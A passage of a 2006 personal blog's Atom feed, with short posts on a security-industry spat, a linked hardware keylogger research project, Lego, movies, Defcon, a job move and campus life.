He also explained to &lt;a href="http://daringfireball.net/"&gt;John Gruber&lt;/a&gt; that the so-called &lt;a href="http://daringfireball.net/2006/09/open_challenge"&gt;challenge&lt;/a&gt; he proposed to Ellch and Maynor &lt;a href="http://securosis.com/2006/09/05/mac-wi-fi-gruber-needs-to-let-it-go-and-maynor-and-ellch-should-ignore-the-challenge/"&gt; was asinine&lt;/a&gt; in a far more even tone than I might have.&lt;br /&gt;&lt;br /&gt;Plus this great quote: &lt;blockquote&gt;Give honest answers to honest questions, and when someone asks for the ROI of a firewall ask them for the ROI on their desk.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-4237451992364833437?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/4237451992364833437/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=4237451992364833437' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/4237451992364833437'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/4237451992364833437'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/11/securosis-and-daringflamebait.html' title='Securosis and Daringflamebait'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-5347874005094118180</id><published>2006-11-08T18:56:00.000-08:00</published><updated>2006-11-08T20:27:37.719-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Keyboard Dancing</title><content type='html'>Keyloggers are cool.  Hardware keyloggers are cooler because they are undetectable to the operating system.  A mark against hardware gizmos is that for them to be useful, one must install the gizmo and then retrieve it.  &lt;a href="http://fuji.cis.upenn.edu/~gauravsh/jitterbug.html"&gt;Until now.&lt;/a&gt;  Now it doesn't have to be retrieved.  Now all one has to do is drop the gizmo and watch for traffic on the internet.  Or own a keyboard manufacturing company.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-5347874005094118180?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/5347874005094118180/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=5347874005094118180' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/5347874005094118180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/5347874005094118180'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/11/keyboard-dancing.html' title='Keyboard Dancing'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' 
width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-116097792550568622</id><published>2006-10-15T22:51:00.000-07:00</published><updated>2006-11-05T13:31:05.421-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='lego'/><title type='text'>Vikings are not magical</title><content type='html'>I've been resisting the new Lego sets for a while now because of their futuristic depictions of supposedly historical eras.  For example, the Knights' Kingdom II and Vikings series both have giant spring-loaded projectile weapons.  Well today I broke down and bought a &lt;a href="http://www.lego.com/eng/vikings/productPage.aspx?family=&amp;productNumber=7019"&gt;vikings set&lt;/a&gt;.  I'm still uncertain about the ridiculous giant catapult powered by a lone viking. Launching boulders at least three times as big as himself doesn't seem within the realm of possibility for an &lt;a href="http://en.wikipedia.org/wiki/Viking"&gt;8th-11th century&lt;/a&gt; warrior, even if he is a badass.  On the other hand, the armor, weapons, and non-specialty bricks are awesome.&lt;br /&gt;&lt;br /&gt;On a completely unrelated note, Willyk set me up with a new &lt;a href="http://www.photooverflow.com/main.php?g2_itemId=74"&gt;gallery account&lt;/a&gt; today.  Check it out if you're interested.&lt;br /&gt;&lt;br /&gt;Update 2006-11-05: the gallery url has changed and now works.  
=)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-116097792550568622?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/116097792550568622/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=116097792550568622' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/116097792550568622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/116097792550568622'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/10/vikings-are-not-magical_15.html' title='Vikings are not magical'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-115734758203515473</id><published>2006-09-03T21:17:00.000-07:00</published><updated>2007-06-11T21:37:06.560-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='movies'/><title type='text'>Siren's call</title><content type='html'>In the last few weeks, we've rented a number of movies.  So I will succumb to the Internet's siren-like call to publish my opinion so that all who care to read it might find something with which they disagree.  In alphabetical order:&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://imdb.com/title/tt0383222/"&gt;Blood Rayne&lt;/a&gt; - Vampires.  
We gave it the MST3K treatment and got our two bucks worth.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://imdb.com/title/tt0400525/"&gt;The Ice Harvest&lt;/a&gt; - My executive summary: "John Cusack and Billybob Thornton steal some money.  People die.  There are breasts."  Might be a decent movie iff you like film noir.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://imdb.com/title/tt0373469/"&gt;Kiss Kiss Bang Bang&lt;/a&gt; - A good detective film with assorted twists.  I was on the edge of my seat for much of this movie and laughing the rest of the time (Val Kilmer's character is called "Gay Perry").  Great movie with a solid cast, entertaining plot and funny dialogue.  Highly recommended.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://imdb.com/title/tt0449089/"&gt;RV&lt;/a&gt; - This was billed as a slightly ridiculous comedy and it definitely lives up to that description.  But it's not retarded like, say, anything Will Ferrell has ever done.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://imdb.com/title/tt0342258/"&gt;Unleashed&lt;/a&gt; - From the cover and the back-of-the-case description, this is your standard martial arts movie.  
Do not let that fool you; in addition to his incredible physical abilities, Jet Li is quite an actor and Unleashed is a phenomenal movie.&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-115734758203515473?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/115734758203515473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=115734758203515473' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115734758203515473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115734758203515473'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/09/sirens-call.html' title='Siren&apos;s call'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-115518666009359802</id><published>2006-08-09T21:46:00.000-07:00</published><updated>2007-06-11T21:33:43.415-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mosquito'/><category scheme='http://www.blogger.com/atom/ns#' term='conference'/><category scheme='http://www.blogger.com/atom/ns#' term='mosref'/><title type='text'>Defcon 0x0E</title><content type='html'>Defcon was a blast.  I met a bunch of cool people and got to hang out with some old friends.  
fednaught, a &lt;a href="http://www.kenshoto.com"&gt;Capture the Flag&lt;/a&gt; team, got second place despite my help.&lt;br /&gt;&lt;br /&gt;My favorite talks were Hacking Malware: Offence is the New Defence by &lt;a href="http://www.offensivecomputing.net"&gt;Danny Quist and Valsmith&lt;/a&gt; and Exploit Writing Using Injectable Virtual Machines by &lt;a href="http://www.ephemeralsecurity.com"&gt;Wes Brown&lt;/a&gt; and another fellow from the same organization.  The latter because &lt;a href="http://www.toastyguy.dyndns.org/blog"&gt;James&lt;/a&gt; and I were discussing what we would need in order to be prepared for next year's CtF only moments before going into this presentation and hearing that it had already been written.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-115518666009359802?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/115518666009359802/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=115518666009359802' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115518666009359802'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115518666009359802'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/08/defcon-0x0e.html' title='Defcon 0x0E'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-115377315728201926</id><published>2006-07-24T13:31:00.000-07:00</published><updated>2006-10-15T22:59:48.616-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='intar-tubes'/><title type='text'>Highly Sceintific Random Internet Tests</title><content type='html'>Apparently I'm in the 93rd percentile for nerdiness based on this Highly Scientific Random Internet Test.  This is a dubious honor but one that I felt was worth sharing. &lt;br /&gt;&lt;a href="http://www.nerdtests.com/ft_nq.php?im"&gt;&lt;img src="http://www.nerdtests.com/images/ft/nq.php?val=1777" alt="I am nerdier than 92% of all people. Are you nerdier? Click here to find out!"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-115377315728201926?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/115377315728201926/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=115377315728201926' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115377315728201926'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115377315728201926'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/07/highly-sceintific-random-internet.html' title='Highly Sceintific Random Internet Tests'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-115229602752578980</id><published>2006-07-07T11:03:00.000-07:00</published><updated>2006-10-15T22:59:48.559-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='life'/><title type='text'>Hello, I must be going</title><content type='html'>We've been in Idaho Falls for about three weeks now.  My job is interesting and I'm enjoying my work.  I haven't learned all the ropes yet; I just figured out how to fill in time cards yesterday.  We're just about settled into our new house but there are still a bunch of boxes that haven't been unpacked.  And now I'm going on travel for two weeks.  That's not really a bad thing; it will be fun and interesting and I will probably learn a ton on my first outing.  But there are a lot of things I need to do here in Idaho Falls.  Mostly paperwork things but important things nonetheless, like finding out where my paycheck goes and making sure it gets deposited before our first month's bills come due.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-115229602752578980?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/115229602752578980/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=115229602752578980' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115229602752578980'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/115229602752578980'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/07/hello-i-must-be-going.html' title='Hello, I must be 
going'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-114963614792222280</id><published>2006-06-06T16:09:00.000-07:00</published><updated>2006-10-15T22:59:48.497-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='life'/><title type='text'>Hurray for IBM</title><content type='html'>I bought a refurbished Thinkpad T40 in March with a 90-day manufacturer's warranty.  After having it for about two months, the USB ports died and the video card started flaking out every time I pressed the machine in the wrong spot.  This was about the time when finals were approaching fast and I could not live without my laptop, so I sucked it up and decided I would just pay to get it fixed out of warranty after the end of the semester.  This afternoon I found the invoice and called IBM.  It turns out that in IBM-land a 90-day warranty that started in March expires in October so they are going to fix it for free.&lt;br /&gt;&lt;br /&gt;Additionally, in the past I have told Dell customer support representatives that the machine I'm calling about does not have Windows installed.  Their response has pretty much universally been, "Then it's your problem, not ours."  
I told the IBM tech support guy the same thing and he said, "We don't care about that."&lt;br /&gt;&lt;br /&gt;Hurray for IBM!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-114963614792222280?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/114963614792222280/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=114963614792222280' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/114963614792222280'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/114963614792222280'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/06/hurray-for-ibm.html' title='Hurray for IBM'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-114957073294401890</id><published>2006-06-05T19:29:00.000-07:00</published><updated>2006-10-15T22:59:48.438-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='life'/><title type='text'>Mmm... Socorro...</title><content type='html'>The closer I get to moving, the more I wish it wasn't so near.&lt;br /&gt;&lt;br /&gt;I've been in Socorro for just shy of six years, now.  For the first 4, I didn't care at all about the town.  But in the last two years, I've made some really great friends and I've come to enjoy many elements of Socorro and New Mexico Tech.  I think a lot of it is the college-town aspect of this place.  
I enjoy walking around campus in the middle of the night for no particular reason and running into a bunch of other caffeinated people doing the same thing.  I find it hilarious when I'm talking to a towny and they ask if I "go to the tech".  I like writing code at El Camino til 4 in the morning.  I like having conversations with random people I've never seen before who laugh at my stupid jokes about big-O notation.&lt;br /&gt;&lt;br /&gt;I'll miss you guys.  And El Camino's green chile cheese fries.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-114957073294401890?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/114957073294401890/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=114957073294401890' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/114957073294401890'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/114957073294401890'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/06/mmm-socorro.html' title='Mmm... 
Socorro...'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-114705738035139068</id><published>2006-05-07T19:56:00.000-07:00</published><updated>2006-10-15T22:59:48.360-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='life'/><title type='text'>New to blogging.</title><content type='html'>Not &lt;span style="font-style: italic;"&gt;really&lt;/span&gt; new to blogging... but new to automated blogging.  My previous blog management software was &lt;a href="vim.org"&gt;vim&lt;/a&gt;.  Don't get me wrong, vim rocks.  But every time I made a post, which happened quite infrequently because it was a pain in the ass, I thought, "Man, I should really write some code to automate this process."&lt;br /&gt;&lt;br /&gt;In the fine CS tradition of not reinventing the wheel I decided to use someone else's code instead.  As an added bonus, I'm using someone else's server and someone else's bandwidth as well.  =)&lt;br /&gt;&lt;br /&gt;Repost of my ramblings which spurred me to get a blogger account:&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;I'm about to graduate a week from today so 'the real world', as it is often called, has been on my mind a lot recently. It really bugs me when I tell people I'm going to graduate and they say something like: "Well I guess you'll soon find out how much the real world sucks. Have to get up earlier and work longer."&lt;br /&gt;&lt;br /&gt;I did some math. I'm studying, working at my student job, doing homework or sitting in class for 60-70 hours per week. That 40 hour/week job with no homework everyone complains about so much sounds pretty sweet.&lt;br /&gt;&lt;br /&gt;I think the 'real world' that you're talking about does suck. 
I wouldn't want to do something meaningless every day for eight hours. But a large percentage of my friends and acquaintances who don't have a degree seem to think that college is a breeze and that we just screw around for 4 years (well, 6 for me) until we get a job like theirs that we hate like they do.&lt;br /&gt;&lt;br /&gt;So in conclusion, no, college is not like the 'real world'. But in two months' time, I'm going to be working with some of the best hackers in the world securing some of the country's most important assets. I'm not sure if that's the real world, either...&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-114705738035139068?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/114705738035139068/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=114705738035139068' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/114705738035139068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/114705738035139068'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2006/05/new-to-blogging.html' title='New to blogging.'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
